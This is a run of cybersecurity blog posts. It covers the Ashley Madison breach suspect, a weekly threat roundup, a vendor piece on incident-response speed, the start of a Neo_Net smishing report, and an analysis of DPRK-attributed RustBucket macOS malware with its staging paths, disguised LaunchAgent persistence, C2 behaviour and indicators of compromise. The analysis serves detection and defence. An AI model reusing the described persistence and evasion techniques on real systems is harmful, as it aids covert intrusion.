Top Suspect in 2015 Ashley Madison Hack Committed Suicide in 2014

When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users, the company’s then-CEO Noel Biderman was quick to point the finger at an unnamed former contractor. But as a new documentary series on Hulu reveals [SPOILER ALERT!], there was just one problem with that theory: Their top suspect had killed himself more than a year before the hackers began publishing stolen user data.

The new documentary, The Ashley Madison Affair, begins airing today on Hulu in the United States and on Disney+ in the United Kingdom. The series features interviews with security experts and journalists, Ashley Madison executives, victims of the breach and jilted spouses.

The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock, a data scientist who worked with the show’s producers at the Warner Bros. production company Wall to Wall Media. Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015.

Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach. That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti-Semitic and far-right groups online in the months leading up to the hack.

Whoever hacked Ashley Madison had access to all employee emails, but they only released Biderman’s messages — three years worth. Apropos of my retrospective report, Bullock found that a great many messages in Biderman’s inbox were belligerent and anti-Semitic screeds from a former Ashley Madison employee named William Brewster Harrison.

William Harrison’s employment contract with Ashley Madison parent Avid Life Media.

The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online, but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service.

There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison.

Ashley Madison’s parent company — Toronto-based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner. But after being informed that Bradshaw was not subject to Canadian trademark laws, Avid Life offered to buy AshleyMadisonSucks.com for $10,000.

When Bradshaw refused to sell the domain, he and his then-girlfriend were subject to an unrelenting campaign of online harassment and blackmail. It now appears those attacks were perpetrated by Harrison, who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw, his then-girlfriend and their friends.

[As the documentary points out, the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison, which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy].

Harrison even went after Bradshaw’s lawyer and wife, listing them both on a website he created called Contact-a-CEO[.]com, which Harrison used to besmirch the name of major companies — including several past employers — all entities he believed had slighted him or his family in some way. The site also claimed to include the names, addresses and phone numbers of top CEOs.

A cached copy of Harrison’s website, contact-the-ceo.com.

An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash-a-Business[.]com, which Harrison dedicated to “all those sorry ass corporate executives out there profiting from your hard work, organs, lives, ideas, intelligence, and wallets.” Copies of the site at archive.org show it was the work of someone calling themselves “The Chaos Creator.”

Will Harrison was terminated as an Ashley Madison employee in November 2011, and by early 2012 he’d turned his considerable harassment skills squarely against the company. Ashley Madison’s long-suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison’s internal systems suggesting that a large percentage of the female accounts on the service were computer-operated bots.

Ashley Madison’s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online. In one exchange on Aug. 16, 2012, Ashley Madison’s director of IT was asked to produce a list of all company employees with all-powerful administrator access.

“Who or what is asdfdfsda@asdf.com?,” Biderman asked, after being sent a list of nine email addresses.

“It appears to be the email address Will used for his profiles,” the IT director replied.

“And his access was never shut off until today?,” asked the company’s general counsel Mike Dacks.

A Biderman email from 2012.

What prompted the data scientist Bullock to reach out were gobs of anti-Semitic diatribes from Harrison, who had taken to labeling Biderman and others “greedy Jew bastards.”

“So good luck, I’m sure we’ll talk again soon, but for now, Ive got better things in the oven,” Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated. “Just remember I outsmarted you last time and I will outsmart and out maneuver you this time too, by keeping myself far far away from the action and just enjoying the sideline view, cheering for the opposition.”

A 2012 email from William Harrison to former Ashley Madison CEO Noel Biderman.

Harrison signed his threatening missive with the salutation, “We are legion,” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers.

The leaked Biderman emails show that Harrison made good on his threats, and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti-Semitic language.

But on Mar. 5, 2014, Harrison committed suicide by shooting himself in the head with a handgun. This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed.

Does Harrison’s untimely suicide rule him out as a suspect in the 2015 hack? Who is The Chaos Creator, and what else transpired between Harrison and Ashley Madison prior to his death? We’ll explore these questions in Part II of this story, to be published early next week.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

The Good | Authorities Arrest Alleged Ringleader of Major Cybercrime Organization

After pocketing as much as $30 million in stolen funds over the course of four years, a suspected senior member of the OPERA1ER cybercrime organization has been arrested in Cote d’Ivoire. The arrest was carried out as part of Interpol’s Operation Nervone with cooperation across local and international law enforcement agencies as well as cybersecurity researchers.

OPERA1ER, aka BlueBottle, NX$M$, DESKTOP Group, or Common Raven, is infamous for over 30 attacks spanning 15 countries in Africa, Asia, and Latin America. According to Interpol, they are a highly mature criminal organization focused on targeting financial institutions and mobile banking services with mass business email compromise (BEC) and malware campaigns.

Source: Group-IB

Based on recent security findings, BEC scams continue to soar. These scams are a sophisticated form of cyber fraud where attackers impersonate legitimate business email accounts to deceive recipients and either initiate fraudulent transactions or gain unauthorized access to sensitive information. Last year alone, IC3 received over 20,000 BEC-related complaints with adjusted losses amounting to over $2.7 billion.

OPERA1ER gains an initial level of compromise through well-crafted spear phishing emails embedded with remote access trojans (RATs), keyloggers, and password stealers. Noted in previous attacks, OPERA1ER emails are in French and often reuse tax office and job hiring language. After breaking in, the group is known to use tools like Cobalt Strike and Metasploit to establish persistence.

The success of Operation Nervone is the result of extensive collaboration between various law enforcement and cybersecurity researchers Orange-CERT-CC and Group-IB, who first published a report on OPERA1ER late last year. The operation represents the importance of exchanging threat intelligence and working collectively to bring down high-profile, organized cybercrime syndicates.

The Bad | High-Severity Vulnerability In Cisco Switches Allows Attackers to Modify Encrypted Traffic

Cisco has issued a security advisory this week warning customers about a new, high severity vulnerability allowing attackers to tamper with encrypted traffic in some data center switches.

Identified as CVE-2023-20185, the vulnerability was found during internal security testing and impacts Cisco Nexus 9332C, 9354C, and 9500 spine switches equipped with a Cisco Nexus N9K-X9736C-FX Line Card, operating in application centric infrastructure (ACI) mode, running firmware 14.0 or later, and that have the CloudSec encryption feature enabled. ACI mode is most typically used in data centers for controlling both physical and virtual networks.

Source: Cisco Security

The vulnerability stems from an issue in the implementation of ciphers leveraged by the CloudSec encryption feature on affected switches. Exploitation of CVE-2023-20185 occurs when an attacker intercepts the traffic and uses cryptanalytic techniques to bypass encryption between two ACI sites.

If exploited, attackers can gain unauthenticated access and either read or tamper with intersite encrypted traffic between the remote sites. Further, successful exploitation enables adversaries to access data that allows them to move laterally across the compromised network.

So far, Cisco’s Product Security Incident Response Team (PSIRT) says it has no indications of active exploitation or public proof of concepts (PoCs) targeting the vulnerability. However, there are no software upgrades to address the vulnerability. This is a developing situation and customers can minimize the risks of unauthorized access and data manipulation by disabling the ACI multi-site CloudSec encryption feature immediately and contacting Cisco support to discuss alternative options.

The Ugly | BlackCat Ransomware Runs Malvertising Campaigns By Cloning Popular File Transfer App

This week, cybersecurity researchers uncovered several malvertising campaigns designed to spread malware-laden installers to unsuspecting WinSCP users. WinSCP is an open-source and free SFTP, FTP, WebDAV, S3 and SCP client, and file manager for Windows that boasts over 201 million downloads and counting. The campaign has since been attributed to the notorious BlackCat ransomware group (aka ALPHV).

Malvertising (malicious advertising) is delivered through legitimate online advertising networks and platforms. These advertisements appear as regular ads on websites, but contain malicious links and code that infects users’ devices with malware. Upon interaction, users are redirected to attacker-controlled websites or prompted to download the malware. Malvertising takes advantage of the trust placed in reputable brands and advertising networks, making it difficult for users to identify the threat.

In the recent BlackCat campaigns, the group used WinSCP specifically to lure IT professionals, web and systems administrators to obtain initial access to valuable target networks. Researchers had discovered ads promoting fake WinSCP sites on both Google and Bing search pages. The spoofed WinSCP sites prompted visitors to download the app, masking behind domain names that are very similar to the real WinSCP website. Further interaction then installed a trojanized DLL file containing a Cobalt Strike beacon that connected to a C2 server.

Source: Trend Micro

Attacks due to malvertising continue to increase, and have recently been seen spreading a new macOS variant of Atomic Stealer, stealing AWS logins, and distributint virtualized .NET malware loaders. Businesses can prevent attacks from malvertising by using firewall control and web filters to block access to known malicious websites, implementing ad blocking software to prevent ads from being displayed, and deploying endpoint protection software to prevent and detect the execution of malicious code delivered through malicious adverts.

Cybersecurity In The Fast Lane | Why Speed Is Key In Incident Response & Mitigation

Threat actors are constantly evolving, consistently developing the tools, tactics, and procedures (TTPs) they use in attacks. In today’s threat landscape, enterprises of all sizes and industries find themselves pitted against professional cybercriminal gangs, advanced persistent threat (APT) groups, and even nation-state actors – all of whom are leveraging faster attack methods than ever before.

In addition to sophisticated TTPs and how organized many cybercrime-as-a-service models have become, enterprises also face the reality of how quickly active threats can become full-blown incidents. Speed, in both cybersecurity and cyberattacks, is the key metric to pay attention to as it defines the success of either the attacker or the defender.

This blog discusses the metric of speed in context of modern threat actors, their methods, and how enterprise security teams can shave off critical seconds and minutes in their own detection and response processes.

Threat Actors Are Picking Up Their Speed

Technology has changed dramatically in the last few years alone, becoming smarter, faster, and more advanced. While enterprises use the latest software and tools to further their businesses, threat actors have done the same to level up their attack methods.

Ransomware Attacks

Consider one of the most significant takeaways from Mandiant’s latest M-Trends report: The global median dwell time – the time marking the beginning of an intrusion and the moment it is identified – is dropping year over year. At a mere 16 days of average dwell time for 2022, this may seem like a positive development as threat actors are spending less time inside a system post-entry. However, skyrocketing counts of ransomware attacks on global businesses give a good indication as to why average dwell times are on the decline.

Though some of the reduction in dwell time is attributed to improved detection and response capabilities, ransomware has become a digital pandemic, targeting victims in all industry verticals. Given its high earning potential for a relatively short attack time frame, ransomware attacks are highly lucrative for threat actors and are protected by security experts to continue rising in both frequency and severity.

Drive-By Download Attacks

As their name suggests, drive-by downloads are stealthy, fast, and often happen before the victim even knows what’s happening. This type of cyberattack is employed by cybercriminals to infect a victim’s device with malware without their knowledge or consent. It typically occurs when they visit a compromised website or click on a malicious link embedded in an email or advertisement.

The attack then takes advantage of vulnerabilities in web browsers, plugins, or operating systems, allowing the malware to be automatically downloaded and executed on the victim’s device. Drive-by downloads require only the bare minimum of a victim’s interaction, making them a potent tool for spreading malware, stealing sensitive information, and gaining unauthorized access to systems.

Mass Scanning For Vulnerabilities

Based on new research, security defenders have a real race against the clock to patch new vulnerabilities. Researchers have found that threat actors start to perform mass, internet-wide scans for vulnerable endpoints within just 15 minutes after a new CVE is disclosed. Threat actors consistently monitor vendor bulletins and software update channels for the latest announcements on vulnerabilities and proof of concepts that they can leverage in their next attack. Oftentimes, these fresh vulnerabilities provide them with the capability to perform remote code execution (RCE) and gain access to corporate networks.

Patch management is a continuous and, for many organizations, arduous task that requires security teams to try to keep up with all the latest security threats and issues in various operating systems. Since performing these internet-wide scans do not require a deep skill set, even low-level criminals are able to take advantage, sometimes even selling their scan results to more experienced actors.

Zero-Day Exploits

Threat actors are gaining momentum on how quickly they can exploit zero-days. In a recent Vulnerability Intelligence Report, researchers cited time-to-exploit as being the critical metric for security practitioners. Over the past three years, the time measured between disclosure and known exploitation has decreased steadily, going from 30% of vulnerabilities exploited in the wild within one week in 2020 to 56% found exploited within one week in 2022. Zero-days are most often exploited to provide initial access for ransomware gangs.

Growing Availability of Off-The-Shelf-Tools

Apart from APT groups, full-fledged ransomware gangs, and nation-backed threat actors, low-level cybercriminals are taking their shot on enterprises due to the widening availability of ready-to-use hacking tools. These tools, including exploit kits, infostealers, scanners, password crackers, and attack simulation tools, are commonly available on forums and darknet markets and significantly lower the barrier to launching serious cyberattacks.

As the market for selling pre-made tools continues to expand, cybercriminals with little to no technical expertise are now able to quickly find and purchase pre-existing scripts to launch attacks on computer systems and networks.

Deciphering How Actors Move Across The Cyber Attack Lifecycle

Though cyber threat actors are moving swiftly, there are ways for enterprise businesses to stay ahead and safeguard their critical data and systems. Understanding how actors maneuver before and during their attacks allows defenders to put in the right safeguards in place.

  • Planning Phase – Before the act of attack, threat actors will select their target and work to identify exploitable aspects of their operations. This refers to any low hanging fruits such as unpatched vulnerabilities, misconfigurations, administrative users on unprotected devices, and more.
  • Initial Intrusion – Based on the findings from the planning phase, threat actors tailor their intrusion technique based on the weaknesses of their victims.
  • Enumeration Phase – Once inside, threat actors move fast to situate themselves within the system, understand the limits of their current permissions, and establish an estimate on what privileges they require to start moving laterally. Time is of the essence in this phase as actors start to establish their foothold and upgrade their access.
  • Lateral Movement – Using their new credentials, the actors are able to spread deep into the affected system. Here, their main goal is to distribute their malware/toolset, exfiltrating and encrypting data as they go.
  • Objective Completion – After deleting or corrupting backups and local files, actors prepare to ransom their victim.

Based on the cyberattack lifecycle, the intrusion and enumeration phases open up a critical window for proactive action by cyber defenders. During these initial stages, the attackers have not yet deeply infiltrated the compromised network or blended in with normal network traffic. If a threat actor manages to make it to the lateral movement phase, detection becomes much more challenging. Threat actors use evasion tactics to avoid detection, embedding themselves deeply within the network. Living-off-the-land techniques are most often used in this phase, leveraging legitimate processes and tools already present in the environment to strengthen their foothold.

Since the time span between intrusion and lateral movement is rapidly shrinking as threat actors become more sophisticated and well-equipped, the primary goal for cyber defenders is to focus on detecting the first signs of compromise during the enumeration phase and isolating the threat before it can cause significant damage.

Autonomous Tools Take the Toil Out of Triage

Managing such a challenge, however, is often beyond the resources of a security team tasked with manual triage of a flood of alerts and uncontextualized event data. That’s why autonomous, AI-powered EDR and XDR solutions are the new go-to tools for analysts, threat hunters and incident responders alike.

A modern security tool like SentinelOne Singularity not only autonomously deals with known malware threats – from detection right through to mitigation and even rollback in the case of a ransomware attack that gets through – but also provides incident responders with contextualized data to tackle targeted attacks.

With automated contextual enrichment from tools such as Singularity XDR, IR teams can take advantage of insights from aggregated event information that combines all related data gathered from multiple tools and services into a single ‘incident’, without adding extra tools or more people. Out-of-the-box integrations and pre-tuned detection mechanisms across the security stack help improve productivity, threat detection, and forensics.

SentinelOne Vigilance Respond | Our Approach to Managed Detection & Response (MDR)

While powerful, such tools can be supplemented by Managed Detection and Response services for an even higher level of security. Organizations across the globe rely on SentinelOne’s Managed Detection and Response (MDR) service, Vigilance Respond, to stop threat actors from reaching the lateral movement stage in attacks. Utilizing SentinelOne Singularity, Vigilance Respond defends networks against cyberattacks instantly and monitors customer environments 24/7/365, hunting for advanced threats and providing faster mean-time-to-response (MTTR) rates.

Vigilance Respond works by providing machine-speed detection technology run by dedicated analysts working around-the-clock. It also allows organizations to adapt instantly, and at scale, in today’s ever-shifting threat landscape, closing the gap between intrusion and lateral movement and neutralizing the threat actor before they can begin to spread deep into a target’s systems.

Vigilance Respond offers these services to ensure businesses are safeguarded:

  • Active threat campaign hunting for APTs
  • Alerting and remediation guidance for emerging threats
  • Incident-based triage and hunting
  • 24/7/365 monitoring, triage, and response
  • Security Assessment (Vigilance Respond Pro)
  • Digital Forensics Investigation & Malware Analysis (Vigilance Respond Pro)

Conclusion

In the realm of cybersecurity, speed matters. It can be the deciding factor between successfully thwarting an attack or suffering substantial damage. As technology evolves and threat actors become more adept at exploiting vulnerabilities, enterprise leaders are investing in strategies focused on swift and proactive cybersecurity response measures.

Ultimately, speed in cybersecurity is about staying one step ahead of the adversaries. It requires a proactive approach, continuous monitoring, and real-time threat intelligence. By prioritizing speed, organizations can enhance their ability to detect, respond to, and mitigate cyber threats, ensuring a stronger and more resilient security posture.

Learn more about how SentinelOne Singularity and Vigilance Respond can help safeguard your business by contacting us or requesting a demo.

Vigilance Respond
Rely on machine-speed technology run by dedicated analysts to adapt to today’s threat landscape.

BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

Back in April, researchers at JAMF detailed a sophisticated APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on infected devices. ‘RustBucket’, as they labeled it, was attributed with strong confidence to the BlueNoroff APT, generally assumed to be a subsidiary of the wider DPRK cyber attack group known as Lazarus.

In May, ESET tweeted details of a second RustBucket variant targeting macOS users, followed in June by Elastic’s discovery of a third variant that included previously unseen persistence capabilities.

RustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages of the malware. In this post, we review the multiple malware payloads used in the campaign and highlight the novel techniques RustBucket deploys to evade analysis and detection.

RustBucket Stage 1 | AppleScript Dropper

The attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled AppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user interface and function merely as a convenient way for developers to distribute AppleScripts to users.

The threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the built-on osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).

Stage 1 executes three ‘do shell script’ commands to set up Stage 2
Stage 1 executes three ‘do shell script’ commands to set up Stage 2

The script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called  Internal PDF Viewer. We will forgo the details here as researchers have previously described this in detail.

Stage 1 writes the second stage to the /Users/Shared/ folder, which does not require permissions and is accessible to malware without having to circumvent TCC. The Stage 1 variant described by Elastic differs in that it writes the second stage as a hidden file to /Users/Shared/.pd.

The Stage 1 is easily the least sophisticated and easily detected part of the attack chain. The arguments of the do shell script commands should appear in the Mac’s unified logs and as output from command line tools such as the ps utility.

Success of the Stage 1 relies heavily on how well the threat actor employs social engineering tactics. In the case described by JAMF, the threat actors used an elaborate ruse of requiring an “internal” PDF reader to read a supposedly confidential or ‘protected’ document. Victims were required to execute the Stage 1 believing it to be capable of reading the PDF they had received. In fact, the Stage 1 was only a dropper, designed to protect the Stage 2 should anyone without the malicious PDF stumble on it.

RustBucket Stage 2 | Payloads Written in Swift and Objective-C

We have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both compiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary. The universal ‘fat’ binaries vary between 160Kb and 210Kb.

Samples of RustBucket Stage 2 vary in size
Samples of RustBucket Stage 2 vary in size

Across the samples, various username strings can be found. Those we have observed in Stage 2 binaries so far include:

/Users/carey/
/Users/eric/
/Users/henrypatel/
/Users/hero/

Despite the differences in size and code artifacts, the Stage 2 payloads have in common the task of retrieving the Stage 3 from the command and control server. The Stage 2 payload requires a specially-crafted PDF to unlock the code which would lead to the downloading of the Stage 3 and provide an XOR’d key to decode the obfuscated C2 appended to the end of the PDF.

In some variants, this data is executed in the downAndExecute function as described by previous researchers; in others, we note that download of the next stage is performed in the aptly-named down_update_run function. This function itself varies across samples. In b02922869e86ad06ff6380e8ec0be8db38f5002b, for example, it runs a hardcoded command via system().

Stage 2 executes a shell command via the system() call to retrieve and run Stage 3
Stage 2 executes a shell command via the system() call to retrieve and run Stage 3

However, the same function in other samples, (e.g., d5971e8a3e8577dbb6f5a9aad248c842a33e7a26) use NSURL APIs and entirely different logic.

Code varies widely among samples, possibly suggesting different developers
Code varies widely among samples, possibly suggesting different developers

Researchers at Elastic noted, further, that in one newer variant of Stage 2 written in Swift, the User-Agent string is all lowercase, whereas in the earlier Objective-C samples they are not.

User-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2
User-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2

Although user agent strings are not inherently case sensitive, if this was a deliberate change it is possible the threat actors are parsing the user agent strings on the server side to weed out unwanted calls to the C2.

In the most recent samples, the payload retrieved by Stage 2 is written to disk as“ErrorCheck.zip” in _CS_DARWIN_USER_TEMP (aka $TMPDIR typically at /var/folders/…/../T/) before being executed on the victim’s device.

RustBucket Stage 3 | New Variant Drops Persistence LaunchAgent

The Stage 3 payload has so far been seen in two distinct variants:

  • A: 182760cbe11fa0316abfb8b7b00b63f83159f5aa Stage3
  • B: b74702c9b82f23ebf76805f1853bc72236bee57c ErrorCheck, System Update

Both variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both. Notably, variant B does away with the webT class seen in variant A for gathering environmental information and checking for execution in a virtual machine via querying the SPHardwareDataType value of system_profiler.

The webT class appears in variant A of the Stage 3 payload
The webT class appears in variant A of the Stage 3 payload

However, variant B has not scrubbed all webT artifacts from the code and reference to the missing module can still be found in the strings.

18070 0x0032bdf4 0x10032bdf4 136  137                            
ascii   /Users/carey/Dev/MAC_DATA/MAC/Trojan/webT/target/x86_64-apple-darwin/release/deps/updator-7a0e7515c124fac6.updator.ab9d0eaa-cgu.0.rcgu.o
<img loading="lazy" class="size-full wp-image-82282" src="https://www.sentinelone.com/wp-content/uploads/2023/07/RustBucket_3.jpg" alt="A string referencing the missing webT module can still be found in Stage 3 variant B” width=”734″ height=”402″ />
A string referencing the missing webT module can still be found in Stage 3 variant B

The substring “Trojan”, which does not appear in earlier variants, is also found in the file path referenced by the same string.

Importantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update and serves as the target executable of the LaunchAgent.

Since the Stage 3 requires a URL as a launch parameter this is provided in the property list as a Program Argument. Curiously, the URL passed to ErrorCheck on launch is appended to this hardcoded URL in the LaunchAgent plist.

RustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch
RustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch

Appending the supplied value to the hardcoded URL can be clearly seen in the code, though whether this is an error or accounted for in the way the string is parsed by the binary we have yet to determine.

Much of the malware functionality found in variant A’s webT methods is, in variant B, now buried in the massive sym.updator::main function. This is responsible for surveilling the environment and parsing the arguments received at launch, processing commands, gathering disk information and more. This massive function is over 22Kb and contains 501 basic blocks. Our analysis of this is ongoing but aside from the functions previously described by Elastic, this function also gathers disk information, including whether the host device’s disk is SSD or the older, rotational platter type.

Among updator::main’s many tasks is gathering disk information
Among updator::main’s many tasks is gathering disk information

After gathering environmental information, the malware calls sym.updator::send_request to post the data to the C2 using the following User Agent string (this time not in lowercase):

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

The malware compares the response against two hardcoded values, 0x31 and 0x30.

Checking the values of the response from the C2
Checking the values of the response from the C2

In the sample analyzed by Elastic, the researchers reported that 0x31 causes the malware to self-terminate while 0x30 allows the operator to drop a further payload in the _CS_DARWIN_USER_TEMP directory.

The choice of Rust and the complexity of the Stage 3 binaries suggest the threat actor was willing to invest considerable effort to thwart analysis of the payload. As the known C2s were unresponsive by the time we conducted our analysis, we were unable to obtain a sample of the next stage of the malware, but already at this point in the operation the malware has gathered a great deal of host information, enabled persistence and opened up a backdoor for further malicious activity.

SentinelOne Protects Against RustBucket Malware

SentinelOne Singularity protects customers from known components of the RustBucket malware. Attempts to install persistence mechanisms on macOS devices are also dynamically detected and blocked by the agent.

SentinelOne Agent User Interface Detects RustBucket malware
SentinelOne Agent User Interface
SentinelOne Singularity Console Detects RustBucket malware
SentinelOne Singularity Console

Conclusion

The RustBucket campaign highlights that the threat actor, whom previous researchers have confidently attributed to DPRK’s BlueNoroff APT, has invested considerable resources in multi-stage malware aimed specifically at macOS users and is evolving its attempts to thwart analysis by security researchers.

The extensive effort made to evade analysis and detection in itself shows the threat actor is aware of the growing adoption of security software by organizations with macOS devices in their fleets, as security teams have increasingly begun to see the need for better protection than provided out-of-the-box. SentinelOne continues to track the RustBucket campaign and our analysis of the known payloads is ongoing.

To see how SentinelOne can help safeguard your organization’s macOS devices, contact us for more information or request a free demo.

Indicators of Compromise

Stage 2 Mach-Os

SHA1 Arch Lang
0df7e1d3b3d54336d986574441778c827ff84bf2 FAT objc
27b101707b958139c32388eb4fd79fcd133ed880 ARM objc
338af1d91b846f2238d5a518f951050f90693488 ARM objc
5304031dc990790a26184b05b3019b2c5fa7022a FAT swift
72167ec09d62cdfb04698c3f96a6131dceb24a9c ARM objc
7f9694b46227a8ebc67745e533bc0c5f38fdfa59 ARM objc
963a86aab1e450b03d51628797572fe9da8410a2 FAT objc
9676f0758c8e8d0e0d203c75b922bcd0aeaa0873 FAT objc
a7f5bf893efa3f6b489efe24195c05ff87585fe3 ARM swift
ac08406818bbf4fe24ea04bfd72f747c89174bdb x86 objc
acf1b5b47789badb519ff60dc93afa9e43bbb376 x86 swift
b02922869e86ad06ff6380e8ec0be8db38f5002b x86 objc
d5971e8a3e8577dbb6f5a9aad248c842a33e7a26 x86 objc
e0e42ac374443500c236721341612865cd3d1eec FAT objc
ed4f16b36bc47a701814b63e30d8ea7a226ca906 FAT swift
fd1cef5abe3e0c275671916a1f3a566f13489416 x86 objc

Stage 3 Version A Mach-Os

SHA1 Arch Lang
182760cbe11fa0316abfb8b7b00b63f83159f5aa FAT rust
3cc19cef767dee93588525c74fe9c1f1bf6f8007 ARM rust
831dc7bc4a234907d94a889bcb60b7bedf1a1e13 x86 rust
8e7b4a0d9a73ec891edf5b2839602ccab4af5bdf x86 rust

Stage 3 Version B Mach-Os

SHA1 Arch Lang
69f24956fb75beb9b93ef974d873914500e35601 ARM rust
8a1b32ab8c2a889985e530425ae00f4428c575cc FAT rust
b74702c9b82f23ebf76805f1853bc72236bee57c FAT rust
cd8f41b91e8f1d8625e076f0a161e46e32c62bbf x86 rust

Malicious PDFs

SHA1 Name
469236d0054a270e117a2621f70f2a494e7fb823 DOJ Report on Bizlato Investigation.pdf
574bbb76ef147b95dfdf11069aaaa90df968e542 Readme.pdf
7e69cb4f9c37fad13de85e91b5a05a816d14f490 InvestmentStrategy(Protected).pdf
7f8f43326f1ce505a8cd9f469a2ded81fa5c81be Jump Crypto Investment Agreement.pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc DOJ Report on Bizlato Investigation_asistant.pdf
e7158bb75adf27262ec3b0f2ca73c802a6222379 Daiwa Ventures.pdf

Stage 1 Applications (.zip)

0738687206a88ecbee176e05e0518effa4ca4166
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
5933f1a20117d48985b60b10b5e42416ac00e018
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa
7e1870a5b24c78a5e357568969aae3a5e7ab857d
89301dfdc5361f1650796fecdac30b7d86c65122
9121509d674091ce1f5f30e9a372b5dcf9bcd257
9a5f6a641cc170435f52c6a759709a62ad5757c7
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0
ca59874172660e6180af2815c3a42c85169aa0b2
d9f1392fb7ed010a0ecc4f819782c179efde9687
e2bcdfbda85c55a4d6070c18723ba4adb7631807

AppleScript main.scpt
dabb4372050264f389b8adcf239366860662ac52

Communications
cloud[.]dnx.capital
crypto.hondchain[.]com.

File Paths

$TMPDIR/ErrorCheck.zip
/Users/Shared/1.zip
/Users/Shared/Internal PDF Viewer.app
/Users/Shared/.pd
~/Library/Metadata/System Update
~/Library/LaunchAgents/com.apple.systemupdate.plist

Neo_Net | The Kingpin of Spanish eCrime

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post marks the start of a series highlighting the best entries, beginning with the winner from Pol Thill.

This in-depth and meticulous research into a cybercrime threat actor targeting thousands of clients of financial institutions makes a significant contribution to our understanding of the cybersecurity landscape and is the worthy winner of our challenge.

Executive Summary

  • Neo_Net has been conducting an eCrime campaign targeting clients of prominent banks globally, with a focus on Spanish and Chilean banks, from June 2021 to April 2023.
  • Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims’ bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims.
  • The campaign employs a multi-stage attack strategy, starting with targeted SMS phishing messages distributed across Spain and other countries, using Sender IDs (SIDs) to create an illusion of authenticity and mimicking reputable financial institutions to deceive victims.
  • Neo_Net has established and rented out a wide-ranging infrastructure, including phishing panels and Android trojans, to multiple affiliates, sold compromised victim data to third parties, and launched a successful Smishing-as-a-Service offering targeting various countries worldwide.

Introduction

An extensive eCrime campaign has been observed targeting clients of prominent banks around the world from June 2021 to April 2023. Notably, the threat actors have predominantly focused on Spanish and Chilean banks, with 30 out of 50 targeted financial institutions headquartered in Spain or Chile, including major banks such as Santander, BBVA and CaixaBank. Banks targeted in other regions include Deutsche Bank, Crédit Agricole and ING. A complete list can be found in Appendix A at the end of this post.

Despite employing relatively unsophisticated tools, the threat actors have achieved a high success rate by tailoring their infrastructure to their specific targets. The campaign has resulted in the theft of over 350,000 EUR from victims’ bank accounts, along with the compromise of a significant amount of Personally Identifiable Information (PII), including telephone numbers, national identity numbers, and names from thousands of victims.

The mastermind behind this operation, known as Neo_Net, has established and rented out a wide-ranging infrastructure, including phishing panels, Smishing software, and Android trojans to multiple affiliates, sold compromised victim data to interested third parties, and has even launched a successful Smishing-as-a-Service offering that targets various countries worldwide. This report will provide a detailed overview of the campaign and delve into the background of Neo_Net, shedding light on his operations over the years.

Fig 1: Countries targeted by Neo_Net
Fig 1: Countries targeted by Neo_Net

eCrime Campaign against Financial Institutions

The campaign employed a sophisticated multi-stage attack strategy that commenced with targeted SMS phishing messages distributed across Spain using Neo_Net’s proprietary service, Ankarex. These messages leveraged Sender IDs (SIDs) to create an illusion of authenticity, mimicking reputable financial institutions in an attempt to deceive the victims.

Fig 2: Demonstration of Ankarex’s SID functionality in the Ankarex News Channel
